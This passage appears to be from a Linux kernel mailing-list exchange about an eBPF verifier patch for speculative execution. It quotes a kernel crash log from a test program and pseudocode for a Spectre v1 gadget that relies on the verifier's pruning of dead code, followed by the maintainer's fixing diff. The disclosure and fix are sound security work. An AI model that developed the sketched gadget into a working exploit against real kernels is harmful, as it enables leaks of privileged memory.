> [ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09
> d2 49 f7 da
> [ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83
> ff 00 75 02
> [ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00
> 10 00 75 04
> [ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95
> [ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337
> [ 9948.481562] #PF error: [normal kernel read fault]
> [ 9948.483878] PGD 0 P4D 0
> [ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
> [ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225
> [ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
> BIOS 1.10.2-1 04/01/2014
> [ 9948.494912] RIP: 0010:0xffffffffc01602f3
> [ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6
> 48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31
> c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc
> cc cc
> [ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287
> [ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848
> [ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001
> [ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002
> [ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000
> [ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000
> [ 9948.525840] FS:  00007f2ad28ad700(0000) GS:ffff8881eb140000(0000)
> knlGS:0000000000000000
> [ 9948.529708] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0
> [ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
> [ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
> [ 9948.542581] Call Trace:
> [ 9948.543760]  ? sk_filter_trim_cap+0x148/0x2d0
> [ 9948.545847]  ? sk_reuseport_is_valid_access+0xa0/0xa0
> [ 9948.548249]  ? skb_copy_datagram_from_iter+0x6e/0x280
> [ 9948.550655]  ? _raw_spin_unlock+0x16/0x30
> [ 9948.552581]  ? deactivate_slab.isra.68+0x59d/0x600
> [ 9948.554866]  ? unix_scm_to_skb+0xd1/0x230
> [ 9948.556780]  ? unix_dgram_sendmsg+0x312/0x940
> [ 9948.558856]  ? unix_stream_connect+0x980/0x980
> [ 9948.560986]  ? aa_sk_perm+0x10c/0x3f0
> [ 9948.563123]  ? kasan_unpoison_shadow+0x35/0x40
> [ 9948.565107]  ? aa_af_perm+0x1e0/0x1e0
> [ 9948.566608]  ? kasan_unpoison_shadow+0x35/0x40
> [ 9948.568463]  ? unix_stream_connect+0x980/0x980
> [ 9948.570397]  ? sock_sendmsg+0x6d/0x80
> [ 9948.571948]  ? sock_write_iter+0x121/0x1c0
> [ 9948.573678]  ? sock_sendmsg+0x80/0x80
> [ 9948.575258]  ? sock_enable_timestamp+0x60/0x60
> [ 9948.576958]  ? iov_iter_init+0x86/0xc0
> [ 9948.578395]  ? __vfs_write+0x294/0x3b0
> [ 9948.579782]  ? kernel_read+0xa0/0xa0
> [ 9948.581152]  ? apparmor_task_setrlimit+0x330/0x330
> [ 9948.582919]  ? vfs_write+0xe7/0x230
> [ 9948.584228]  ? ksys_write+0xa1/0x120
> [ 9948.585559]  ? __ia32_sys_read+0x50/0x50
> [ 9948.587174]  ? do_syscall_64+0x73/0x160
> [ 9948.588872]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
> [ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq
> [ 9948.593654] CR2: 0000000013371337
> [ 9948.595078] ---[ end trace cea5ab7027131bf2 ]---
> =============

Good point, thanks for catching this scenario! I'll get this fixed in
order to reject such programs.

> Aside from that, I also think that the pruning of "dead code" probably
> still permits v1 speculative execution attacks when code vaguely like
> the following is encountered, if it is possible to convince the CPU to
> mispredict the second branch, but I haven't tested that so far:
> 
> R0 = <slow map value, known to be 0>;
> R1 = <fast map value>;
> if (R1 != R0) { // mispredicted
>   return 0;
> }
> R3 = <a map value pointer>;
> R2 = <arbitrary 64-bit number>;
> if (R1 == 0) { // architecturally always taken, verifier prunes other branch
>   R2 = <a map value pointer>;
> }
> access R3[R2[0] & 1];
> 
> To convince the CPU to predict the second branch the way you want, you
> could probably add another code path that jumps in front of the branch
> with both R2 and R3 already containing valid pointers. Something like
> this:
> 
> if (<some map value>) {
>   R0 = <slow map value, known to be 0>;
>   R1 = <fast map value>;
>   if (R1 != R0) { // mispredicted
>     return 0;
>   }
>   R3 = <a map value pointer>;
>   R2 = <arbitrary 64-bit number>;} else {  R3 = <a map value pointer>;
>  R2 = <arbitrary 64-bit number>;  R1 = 1;}
> if (R1 == 0) { // architecturally always taken, verifier prunes other branch
>   R2 = <a map value pointer>;
> }
> access R3[R2[0] & 1];

Thanks, I'll look into evaluating this case as well after the fix.

Best,
Daniel

Patch
diff mbox series

diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
index 3f84f3e..27b7494 100644
--- a/include/linux/bpf_verifier.h
+++ b/include/linux/bpf_verifier.h
@@ -148,6 +148,7 @@  struct bpf_verifier_state {
 	/* call stack tracking */
 	struct bpf_func_state *frame[MAX_CALL_FRAMES];
 	u32 curframe;
+	bool speculative;
 };
 
 #define bpf_get_spilled_reg(slot, frame)				\
@@ -167,15 +168,24 @@  struct bpf_verifier_state_list {
 	struct bpf_verifier_state_list *next;
 };
 
+/* Possible states for alu_state member. */
+#define BPF_ALU_SANITIZE_SRC		1U
+#define BPF_ALU_SANITIZE_DST		2U
+#define BPF_ALU_NEG_VALUE		(1U << 2)
+#define BPF_ALU_SANITIZE		(BPF_ALU_SANITIZE_SRC | \
+					 BPF_ALU_SANITIZE_DST)
+
 struct bpf_insn_aux_data {
 	union {
 		enum bpf_reg_type ptr_type;	/* pointer type for load/store insns */
 		unsigned long map_state;	/* pointer/poison value for maps */
 		s32 call_imm;			/* saved imm field of call insn */
+		u32 alu_limit;			/* limit for add/sub register with pointer */
 	};
 	int ctx_field_size; /* the ctx field size for load insn, maybe 0 */
 	int sanitize_stack_off; /* stack slot to be cleared */
 	bool seen; /* this insn was processed by the verifier */
+	u8 alu_state; /* used in combination with alu_limit */
 };
 
 #define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 8e5da1c..f6bc62a 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -710,6 +710,7 @@  static int copy_verifier_state(struct bpf_verifier_state *dst_state,
 		free_func_state(dst_state->frame[i]);
 		dst_state->frame[i] = NULL;
 	}
+	dst_state->speculative = src->speculative;
 	dst_state->curframe = src->curframe;
 	for (i = 0; i <= src->curframe; i++) {
 		dst = dst_state->frame[i];
@@ -754,7 +755,8 @@  static int pop_stack(struct bpf_verifier_env *env, int *prev_insn_idx,
 }
 
 static struct bpf_verifier_state *push_stack(struct bpf_verifier_env *env,
-					     int insn_idx, int prev_insn_idx)
+					     int insn_idx, int prev_insn_idx,
+					     bool speculative)
 {
 	struct bpf_verifier_state *cur = env->cur_state;
 	struct bpf_verifier_stack_elem *elem;
@@ -772,6 +774,7 @@  static struct bpf_verifier_state *push_stack(struct bpf_verifier_env *env,
 	err = copy_verifier_state(&elem->st, cur);
 	if (err)
 		goto err;
+	elem->st.speculative |= speculative;
 	if (env->stack_size > BPF_COMPLEXITY_LIMIT_STACK) {
 		verbose(env, "BPF program is too complex\n");
 		goto err;
@@ -3067,6 +3070,102 @@  static bool check_reg_sane_offset(struct bpf_verifier_env *env,
 	return true;
 }
 
+static struct bpf_insn_aux_data *cur_aux(struct bpf_verifier_env *env)
+{
+	return &env->insn_aux_data[env->insn_idx];
+}
+
+static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
+			      u32 *ptr_limit, u8 opcode, bool off_is_neg)
+{
+	bool mask_to_left = (opcode == BPF_ADD &&  off_is_neg) ||
+			    (opcode == BPF_SUB && !off_is_neg);
+	u32 off;
+
+	switch (ptr_reg->type) {
+	case PTR_TO_STACK:
+		off = ptr_reg->off + ptr_reg->var_off.value;
+		if (mask_to_left)
+			*ptr_limit = MAX_BPF_STACK + off;
+		else
+			*ptr_limit = -off;
+		return 0;
+	case PTR_TO_MAP_VALUE:
+		if (mask_to_left) {
+			*ptr_limit = ptr_reg->umax_value + ptr_reg->off;
+		} else {
+			off = ptr_reg->smin_value + ptr_reg->off;
+			*ptr_limit = ptr_reg->map_ptr->value_size - off;
+		}
+		return 0;
+	default:
+		return -EINVAL;
+	}
+}
+
+static int sanitize_ptr_alu(struct bpf_verifier_env *env,
+			    struct bpf_insn *insn,
+			    const struct bpf_reg_state *ptr_reg,
+			    struct bpf_reg_state *dst_reg,
+			    bool off_is_neg)
+{
+	struct bpf_verifier_state *vstate = env->cur_state;
+	struct bpf_insn_aux_data *aux = cur_aux(env);
+	bool ptr_is_dst_reg = ptr_reg == dst_reg;
+	u8 opcode = BPF_OP(insn->code);
+	u32 alu_state, alu_limit;
+	struct bpf_reg_state tmp;
+	bool ret;
+
+	if (env->allow_ptr_leaks || BPF_SRC(insn->code) == BPF_K)
+		return 0;
+
+	/* We already marked aux for masking from non-speculative
+	 * paths, thus we got here in the first place. We only care
+	 * to explore bad access from here.
+	 */
+	if (vstate->speculative)
+		goto do_sim;
+
+	alu_state  = off_is_neg ? BPF_ALU_NEG_VALUE : 0;
+	alu_state |= ptr_is_dst_reg ?
+		     BPF_ALU_SANITIZE_SRC : BPF_ALU_SANITIZE_DST;
+
+	if (retrieve_ptr_limit(ptr_reg, &alu_limit, opcode, off_is_neg))
+		return 0;
+
+	/* If we arrived here from different branches with different
+	 * limits to sanitize, then this won't work.
+	 */
+	if (aux->alu_state &&
+	    (aux->alu_state != alu_state ||
+	     aux->alu_limit != alu_limit))
+		return -EACCES;
+
+	/* Corresponding fixup done in fixup_bpf_calls(). */
+	aux->alu_state = alu_state;
+	aux->alu_limit = alu_limit;
+
+do_sim:
+	/* Simulate and find potential out-of-bounds access under
+	 * speculative execution from truncation as a result of
+	 * masking when off was not within expected range. If off
+	 * sits in dst, then we temporarily need to move ptr there
+	 * to simulate dst (== 0) +/-= ptr. Needed, for example,
+	 * for cases where we use K-based arithmetic in one direction
+	 * and truncated reg-based in the other in order to explore
+	 * bad access.
+	 */
+	if (!ptr_is_dst_reg) {
+		tmp = *dst_reg;
+		*dst_reg = *ptr_reg;
+	}
+	ret = push_stack(env, env->insn_idx + 1, env->insn_idx, true);
+	if (!ptr_is_dst_reg)
+		*dst_reg = tmp;
+	return !ret ? -EFAULT : 0;
+}
+
 /* Handles arithmetic on a pointer and a scalar: computes new min/max and var_off.
  * Caller should also handle BPF_MOV case separately.
  * If we return -EACCES, caller may want to try again treating pointer as a
@@ -3087,6 +3186,7 @@  static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 	    umin_ptr = ptr_reg->umin_value, umax_ptr = ptr_reg->umax_value;
 	u32 dst = insn->dst_reg, src = insn->src_reg;
 	u8 opcode = BPF_OP(insn->code);
+	int ret;
 
 	dst_reg = &regs[dst];
 
@@ -3142,6 +3242,11 @@  static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 
 	switch (opcode) {
 	case BPF_ADD:
+		ret = sanitize_ptr_alu(env, insn, ptr_reg, dst_reg, smin_val < 0);
+		if (ret < 0) {
+			verbose(env, "R%d tried to add from different maps or paths\n", dst);
+			return ret;
+		}
 		/* We can take a fixed offset as long as it doesn't overflow
 		 * the s32 'off' field
 		 */
@@ -3192,6 +3297,11 @@  static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 		}
 		break;
 	case BPF_SUB:
+		ret = sanitize_ptr_alu(env, insn, ptr_reg, dst_reg, smin_val < 0);
+		if (ret < 0) {
+			verbose(env, "R%d tried to sub from different maps or paths\n", dst);
+			return ret;
+		}
 		if (dst_reg == off_reg) {
 			/* scalar -= pointer.  Creates an unknown scalar */
 			verbose(env, "R%d tried to subtract pointer from scalar\n",
@@ -4389,7 +4499,8 @@  static int check_cond_jmp_op(struct bpf_verifier_env *env,
 		}
 	}
 
-	other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
+	other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx,
+				  false);
 	if (!other_branch)
 		return -EFAULT;
 	other_branch_regs = other_branch->frame[other_branch->curframe]->regs;
@@ -5499,6 +5610,12 @@  static bool states_equal(struct bpf_verifier_env *env,
 	if (old->curframe != cur->curframe)
 		return false;
 
+	/* Verification state from speculative execution simulation
+	 * must never prune a non-speculative execution one.
+	 */
+	if (old->speculative && !cur->speculative)
+		return false;
+
 	/* for states to be equal callsites have to be the same
 	 * and all frame states need to be equivalent
 	 */
@@ -5700,6 +5817,7 @@  static int do_check(struct bpf_verifier_env *env)
 	if (!state)
 		return -ENOMEM;
 	state->curframe = 0;
+	state->speculative = false;
 	state->frame[0] = kzalloc(sizeof(struct bpf_func_state), GFP_KERNEL);
 	if (!state->frame[0]) {
 		kfree(state);
@@ -5739,8 +5857,10 @@  static int do_check(struct bpf_verifier_env *env)
 			/* found equivalent state, can prune the search */
 			if (env->log.level) {
 				if (do_print_state)
-					verbose(env, "\nfrom %d to %d: safe\n",
-						env->prev_insn_idx, env->insn_idx);
+					verbose(env, "\nfrom %d to %d%s: safe\n",
+						env->prev_insn_idx, env->insn_idx,
+						env->cur_state->speculative ?
+						" (speculative execution)" : "");
 				else
 					verbose(env, "%d: safe\n", env->insn_idx);
 			}
@@ -5757,8 +5877,10 @@  static int do_check(struct bpf_verifier_env *env)
 			if (env->log.level > 1)
 				verbose(env, "%d:", env->insn_idx);
 			else
-				verbose(env, "\nfrom %d to %d:",
-					env->prev_insn_idx, env->insn_idx);
+				verbose(env, "\nfrom %d to %d%s:",
+					env->prev_insn_idx, env->insn_idx,
+					env->cur_state->speculative ?
+					" (speculative execution)" : "");
 			print_verifier_state(env, state->frame[state->curframe]);
 			do_print_state = false;
 		}
@@ -6750,6 +6872,57 @@  static int fixup_bpf_calls(struct bpf_verifier_env *env)
 			continue;
 		}
 
+		if (insn->code == (BPF_ALU64 | BPF_ADD | BPF_X) ||
+		    insn->code == (BPF_ALU64 | BPF_SUB | BPF_X)) {
+			const u8 code_add = BPF_ALU64 | BPF_ADD | BPF_X;
+			const u8 code_sub = BPF_ALU64 | BPF_SUB | BPF_X;
+			struct bpf_insn insn_buf[16];
+			struct bpf_insn *patch = &insn_buf[0];
+			bool issrc, isneg;
+			u32 off_reg;
+
+			aux = &env->insn_aux_data[i + delta];
+			if (!aux->alu_state)
+				continue;
+
+			isneg = aux->alu_state & BPF_ALU_NEG_VALUE;
+			issrc = (aux->alu_state & BPF_ALU_SANITIZE) ==
+				BPF_ALU_SANITIZE_SRC;
+
+			off_reg = issrc ? insn->src_reg : insn->dst_reg;
+			if (isneg)
+				*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);
+			*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);
+			*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
+			*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
+			*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
+			*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
+			if (issrc) {
+				*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX,
+							 off_reg);
+				insn->src_reg = BPF_REG_AX;
+			} else {
+				*patch++ = BPF_ALU64_REG(BPF_AND, off_reg,
+							 BPF_REG_AX);
+			}
+			if (isneg)
+				insn->code = insn->code == code_add ?
+					     code_sub : code_add;
+			*patch++ = *insn;
+			if (issrc && isneg)
+				*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);
+			cnt = patch - insn_buf;
+
+			new_prog = bpf_patch_insn_data(env, i + delta, insn_buf, cnt);
+			if (!new_prog)
+				return -ENOMEM;
+
+			delta    += cnt - 1;
+			env->prog = prog = new_prog;
+			insn      = new_prog->insnsi + i + delta;
+			continue;
+		}
+
 		if (insn->code != (BPF_JMP | BPF_CALL))
 			continue;
 		if (insn->src_reg == BPF_PSEUDO_CALL)